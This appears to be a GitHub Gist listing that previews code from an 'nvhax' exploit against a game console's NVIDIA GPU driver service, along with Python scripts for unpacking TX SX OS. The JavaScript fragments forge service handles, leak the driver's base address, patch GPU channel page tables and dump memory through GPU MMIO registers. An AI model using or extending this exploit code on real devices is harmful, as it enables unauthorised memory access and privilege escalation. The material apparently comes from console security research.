Skip to content

Instantly share code, notes, and snippets.

View nvhax_dump_proc.js
sploitcore.prototype.nvhax_patch_creport = function(ch_base_addr, dram_addr, pid, mem_offset, mem_size) {
var gpu_va = [0, 0x04];
var dram_base_addr = (dram_addr & 0xFFF00000);
var dram_offset = (dram_addr & 0x000F0000);
// Map GPU MMIO
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);
// Patch the channel with the base DRAM address
var ch_iova = this.nvhax_patch_channel(ch_base_addr, dram_base_addr);
View nvhax_peephole.js
sploitcore.prototype.nvhax_peephole_dump_mem = function(ch_iova, gpu_va, mem_size) {
// Map GPU MMIO
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);
// Write the channel's iova in PEEPHOLE PBUS register
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 | ch_iova));
// Write the GPU virtual address in PEEPHOLE registers
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);
View nvhax_patch_channel.js
sploitcore.prototype.nvhax_patch_channel = function(ch_base_addr, target_paddr) {
// Map GPU MMIO
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);
// Page directory is always at channel + 0x15000
var pdb_vaddr = utils.add2(ch_base_addr, 0x15000);
// Read page directory base IOVA
var pdb_iova_lo = this.nvhax_read32(utils.add2(ch_base_addr, 0x200));
var pdb_iova_hi = this.nvhax_read32(utils.add2(ch_base_addr, 0x204));
View nvhax_find_channel.js
sploitcore.prototype.nvhax_find_channel = function(hw_num) {
var mem_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40000);
var page_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40100);
var test_addr = [0, 0];
var ch_base_addr = [0, 0];
// Look for user channel
while (test_addr[1] < 0x80)
{
var result = this.nvhax_svc(0x06, [mem_info_addr, page_info_addr, test_addr], [], false);
View sploitcore_nvhax.js
/*
nvhax exploit
*/
// Global nvservices exploit context
sploitcore.prototype.nvdrv_exp_ctx = {};
sploitcore.prototype.spawn_nvdrv_srv = function(sm_handle, transf_mem_addr, transf_mem_size) {
// Forge a new service handle for NVDRV
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t");
View sploitcore_break_nvdrv.js
sploitcore.prototype.break_nvdrv = function(sm_handle) {
var meminfo = this.malloc(0x20);
var pageinfo = this.malloc(0x8);
// Leak nvservices base address
var nvdrv_base = this.get_nvdrv_base(sm_handle);
// Forge a new service handle for NVDRV
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t");
View sploitcore_nvdrv_leak.js
sploitcore.prototype.nvdrv_sharedmem_leak = function(nvdrv_buf, dev_handle) {
var temp_buf = this.malloc(0x1000);
var nvdrv_ioctl = this.bridge(0x1A247C, types.int, types.void_p, types.int, types.int, types.void_p, types.void_p, types.void_p);
// Setup buffers
var in_buf_ioctl = utils.add2(temp_buf, 0x000);
var out_buf_ioctl = utils.add2(temp_buf, 0x100);
var out_buf_status = utils.add2(temp_buf, 0x200);
var in_buf = utils.add2(temp_buf, 0x800);
var out_buf = utils.add2(temp_buf, 0x900);
View sploitcore_send_request.js
sploitcore.prototype.send_request = function(srv_handle, type, domain_id, cmd_id, params, dump_reply, show_log) {
var req_buf = this.malloc(0x1000);
if (show_log)
utils.log('Request buf: ' + utils.paddr(req_buf));
var request_reply = [0, 0];
var err_code = [0, 0];
// One handle and 2 words input type
View tx_decompress.py
# The following is adapted from https://github.com/reswitched/loaders/blob/master/nxo64.py
#
# ===========================================================================================
#
# Copyright 2017 Reswitched Team
#
# Permission to use, copy, modify, and/or distribute this software for any purpose with or
# without fee is hereby granted, provided that the above copyright notice and this permission
# notice appear in all copies.
#
View tx_unpack.py
###############################################
# TX SX OS unpacker - by hexkyz and naehrwert #
###############################################
from Crypto.Cipher import AES
from Crypto.Util import Counter
import os
import struct
"""
You can’t perform that action at this time.